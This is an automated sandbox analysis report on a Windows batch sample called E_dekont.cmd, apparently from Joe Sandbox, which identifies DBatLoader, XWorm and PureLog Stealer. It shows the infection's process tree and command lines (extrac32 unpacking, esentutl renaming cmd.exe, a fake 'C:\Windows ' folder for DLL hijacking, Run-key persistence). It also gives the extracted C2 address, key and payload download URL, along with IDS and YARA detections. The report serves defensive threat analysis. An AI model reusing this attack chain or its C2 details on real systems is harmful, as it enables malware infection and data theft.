Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
E_dekont.cmd

Overview

General Information

Sample name:E_dekont.cmd
Analysis ID:1546600
MD5:79c1ba6106f6cb367fc280abae110506
SHA1:2656bbcf91b0dd2261a5b9fb44e41539931243ac
SHA256:09ed171d42a56e9db61a78259695d8d3b2e623348ed2d24dc58745e134997df6
Tags:cmduser-lowmal3
Infos:

Detection

DBatLoader, Nitol, PureLog Stealer, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Nitol
Yara detected PureLog Stealer
Yara detected XWorm
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates files in the system32 config directory
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Machine Learning detection for dropped file
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 4276 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\E_dekont.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 4912 cmdline: extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • x.exe (PID: 3840 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 943266BC468E334D168F1F43831E8B7D)
      • cmd.exe (PID: 2332 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\wdmvmswJ.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 5364 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • esentutl.exe (PID: 7028 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • alpha.pif (PID: 7048 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • alpha.pif (PID: 2452 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • alpha.pif (PID: 1056 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • xpha.pif (PID: 1728 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • alpha.pif (PID: 3828 cmdline: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • alpha.pif (PID: 5640 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • alpha.pif (PID: 5656 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • esentutl.exe (PID: 5644 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 1444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wdmvmswJ.pif (PID: 4536 cmdline: C:\Users\Public\Libraries\wdmvmswJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • svchost.exe (PID: 2332 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • armsvc.exe (PID: 6740 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: E270AE516A40989DA2942FC5476DC07D)
  • alg.exe (PID: 4916 cmdline: C:\Windows\System32\alg.exe MD5: C735DBF5B2240108A94A4D6FB664CF20)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 2036 cmdline: C:\Windows\system32\AppVClient.exe MD5: 967B8B62127D887C6080C553324E82B9)
  • FXSSVC.exe (PID: 3676 cmdline: C:\Windows\system32\fxssvc.exe MD5: 43FB9AC7ED234297B5E93DB791F8F5A8)
  • elevation_service.exe (PID: 7028 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BE02F61FAC56C7D6563B746AF0B6AB07)
  • Jwsmvmdw.PIF (PID: 2636 cmdline: "C:\Users\Public\Libraries\Jwsmvmdw.PIF" MD5: 943266BC468E334D168F1F43831E8B7D)
    • wdmvmswJ.pif (PID: 2056 cmdline: C:\Users\Public\Libraries\wdmvmswJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • maintenanceservice.exe (PID: 7048 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 6E2F1562B4D5A495EA5EE8392DBBC2E3)
  • msdtc.exe (PID: 6104 cmdline: C:\Windows\System32\msdtc.exe MD5: 7C2A7829306AFD07E0A7BEE6B5203F55)
  • PerceptionSimulationService.exe (PID: 2532 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 083A7B3F7A1D4646EF789825E52C02AC)
  • Jwsmvmdw.PIF (PID: 6036 cmdline: "C:\Users\Public\Libraries\Jwsmvmdw.PIF" MD5: 943266BC468E334D168F1F43831E8B7D)
    • wdmvmswJ.pif (PID: 6792 cmdline: C:\Users\Public\Libraries\wdmvmswJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • perfhost.exe (PID: 7132 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 66E9108DA1C020C738D8EA65CDBF5BE1)
  • Locator.exe (PID: 5736 cmdline: C:\Windows\system32\locator.exe MD5: 525F4AE8B0B51CA29D93DB1875D48945)
  • SensorDataService.exe (PID: 5184 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 78D3D3C671FAB25B9BF6149AD1D00F30)
  • snmptrap.exe (PID: 3528 cmdline: C:\Windows\System32\snmptrap.exe MD5: 16010E8846BCE27721A406159D8AE296)
  • Spectrum.exe (PID: 5656 cmdline: C:\Windows\system32\spectrum.exe MD5: 5B5A04180D3C1BE14C02BA823EFE4460)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
NitolNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nitol
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["62.60.190.120"], "Port": "7923", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: DBatLoader

{"Download Url": ["https://chichometextiles.com/wp-admin/233_Jwsmvmdweya"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000026.00000001.1748961423.0000000000400000.00000040.00000001.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 BE 88 44 24 2B 88 44 24 2F B0 6D 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
0000001E.00000001.1659980996.0000000000400000.00000040.00000001.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 BE 88 44 24 2B 88 44 24 2F B0 6D 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        Click to see the 17 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        38.2.wdmvmswJ.pif.1e8fecae.7.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          38.1.wdmvmswJ.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 BE 88 44 24 2B 88 44 24 2F B0 6D 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          38.2.wdmvmswJ.pif.213f0000.13.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            12.3.wdmvmswJ.pif.1e700000.852.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              38.2.wdmvmswJ.pif.1eb40f08.9.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 128 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 3840, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                Sigma detected: Execution from Suspicious Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\wdmvmswJ.pif, CommandLine: C:\Users\Public\Libraries\wdmvmswJ.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\wdmvmswJ.pif, NewProcessName: C:\Users\Public\Libraries\wdmvmswJ.pif, OriginalFileName: C:\Users\Public\Libraries\wdmvmswJ.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 3840, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\wdmvmswJ.pif, ProcessId: 4536, ProcessName: wdmvmswJ.pif
                Sigma detected: New RUN Key Pointing to Suspicious Folder
                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Jwsmvmdw.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 3840, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Jwsmvmdw
                Sigma detected: Suspicious Program Location with Network Connections
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 54.244.188.177, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\wdmvmswJ.pif, Initiated: true, ProcessId: 4536, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49708
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Jwsmvmdw.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 3840, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Jwsmvmdw
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\wdmvmswJ.pif, CommandLine: C:\Users\Public\Libraries\wdmvmswJ.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\wdmvmswJ.pif, NewProcessName: C:\Users\Public\Libraries\wdmvmswJ.pif, OriginalFileName: C:\Users\Public\Libraries\wdmvmswJ.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 3840, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\wdmvmswJ.pif, ProcessId: 4536, ProcessName: wdmvmswJ.pif
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc, CommandLine: C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 3840, ParentProcessName: x.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc, ProcessId: 2332, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc, CommandLine: C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 3840, ParentProcessName: x.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc, ProcessId: 2332, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:23:32.190942+010020229301A Network Trojan was detected4.245.163.56443192.168.2.849716TCP
                2024-11-01T08:24:12.472558+010020229301A Network Trojan was detected4.245.163.56443192.168.2.849776TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:23:16.871535+010020283713Unknown Traffic192.168.2.849707188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:25:11.952862+010020516541A Network Trojan was detected192.168.2.8507111.1.1.153UDP
                2024-11-01T08:25:36.645562+010020516541A Network Trojan was detected192.168.2.8621171.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:24:43.880385+010020516511A Network Trojan was detected192.168.2.8583901.1.1.153UDP
                2024-11-01T08:25:01.435276+010020516511A Network Trojan was detected192.168.2.8579931.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:25:04.581923+010020516531A Network Trojan was detected192.168.2.8619891.1.1.153UDP
                2024-11-01T08:25:29.600322+010020516531A Network Trojan was detected192.168.2.8557301.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:25:19.683653+010020516501A Network Trojan was detected192.168.2.8576341.1.1.153UDP
                2024-11-01T08:25:45.476852+010020516501A Network Trojan was detected192.168.2.8574711.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:25:40.053200+010020516521A Network Trojan was detected192.168.2.8503551.1.1.153UDP
                2024-11-01T08:26:10.393172+010020516521A Network Trojan was detected192.168.2.8606841.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:23:29.931761+010020516491A Network Trojan was detected192.168.2.8615271.1.1.153UDP
                2024-11-01T08:23:34.433751+010020516491A Network Trojan was detected192.168.2.8607701.1.1.153UDP
                2024-11-01T08:25:56.877353+010020516491A Network Trojan was detected192.168.2.8607911.1.1.153UDP
                2024-11-01T08:26:27.901947+010020516491A Network Trojan was detected192.168.2.8537061.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:23:28.543237+010020516481A Network Trojan was detected192.168.2.8650931.1.1.153UDP
                2024-11-01T08:23:31.944441+010020516481A Network Trojan was detected192.168.2.8513661.1.1.153UDP
                2024-11-01T08:25:55.505583+010020516481A Network Trojan was detected192.168.2.8602531.1.1.153UDP
                2024-11-01T08:26:27.017207+010020516481A Network Trojan was detected192.168.2.8498461.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:23:23.960930+010020181411A Network Trojan was detected54.244.188.17780192.168.2.849708TCP
                2024-11-01T08:23:28.532789+010020181411A Network Trojan was detected44.221.84.10580192.168.2.849711TCP
                2024-11-01T08:23:36.310447+010020181411A Network Trojan was detected18.141.10.10780192.168.2.849731TCP
                2024-11-01T08:23:55.277577+010020181411A Network Trojan was detected34.246.200.16080192.168.2.849745TCP
                2024-11-01T08:23:58.310559+010020181411A Network Trojan was detected13.251.16.15080192.168.2.849749TCP
                2024-11-01T08:24:00.925861+010020181411A Network Trojan was detected47.129.31.21280192.168.2.849752TCP
                2024-11-01T08:24:00.958134+010020181411A Network Trojan was detected35.164.78.20080192.168.2.849753TCP
                2024-11-01T08:24:09.222987+010020181411A Network Trojan was detected18.208.156.24880192.168.2.849771TCP
                2024-11-01T08:24:13.550781+010020181411A Network Trojan was detected18.246.231.12080192.168.2.849779TCP
                2024-11-01T08:24:16.544350+010020181411A Network Trojan was detected3.94.10.3480192.168.2.849785TCP
                2024-11-01T08:24:19.927368+010020181411A Network Trojan was detected34.211.97.4580192.168.2.849790TCP
                2024-11-01T08:24:26.569235+010020181411A Network Trojan was detected3.254.94.18580192.168.2.849802TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:23:23.960930+010020377711A Network Trojan was detected54.244.188.17780192.168.2.849708TCP
                2024-11-01T08:23:28.532789+010020377711A Network Trojan was detected44.221.84.10580192.168.2.849711TCP
                2024-11-01T08:23:36.310447+010020377711A Network Trojan was detected18.141.10.10780192.168.2.849731TCP
                2024-11-01T08:23:55.277577+010020377711A Network Trojan was detected34.246.200.16080192.168.2.849745TCP
                2024-11-01T08:23:58.310559+010020377711A Network Trojan was detected13.251.16.15080192.168.2.849749TCP
                2024-11-01T08:24:00.925861+010020377711A Network Trojan was detected47.129.31.21280192.168.2.849752TCP
                2024-11-01T08:24:00.958134+010020377711A Network Trojan was detected35.164.78.20080192.168.2.849753TCP
                2024-11-01T08:24:09.222987+010020377711A Network Trojan was detected18.208.156.24880192.168.2.849771TCP
                2024-11-01T08:24:13.550781+010020377711A Network Trojan was detected18.246.231.12080192.168.2.849779TCP
                2024-11-01T08:24:16.544350+010020377711A Network Trojan was detected3.94.10.3480192.168.2.849785TCP
                2024-11-01T08:24:19.927368+010020377711A Network Trojan was detected34.211.97.4580192.168.2.849790TCP
                2024-11-01T08:24:26.569235+010020377711A Network Trojan was detected3.254.94.18580192.168.2.849802TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:23:23.955756+010028508511Malware Command and Control Activity Detected192.168.2.84970854.244.188.17780TCP
                2024-11-01T08:24:25.548314+010028508511Malware Command and Control Activity Detected192.168.2.84980018.246.231.12080TCP
                2024-11-01T08:25:28.114246+010028508511Malware Command and Control Activity Detected192.168.2.85017118.141.10.10780TCP
                2024-11-01T08:26:47.698015+010028508511Malware Command and Control Activity Detected192.168.2.85626882.112.184.19780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:23:40.212666+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:23:46.016418+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:23:57.508298+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:24:09.007426+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:24:10.211554+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:24:20.520085+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:24:32.007656+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:24:40.219750+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:24:41.663178+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:24:43.077139+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:24:47.228047+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:24:50.122258+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:24:58.632852+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:04.039444+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:10.054397+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:10.215574+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:21.733062+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:22.898815+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:32.758382+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:33.695443+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:33.756603+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:33.845956+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:39.436954+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:39.957726+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:39.957995+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:40.218338+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:40.229253+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:40.562090+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:40.562370+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:47.288526+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:55.804685+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:55.955396+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:26:07.319657+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:26:10.211450+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
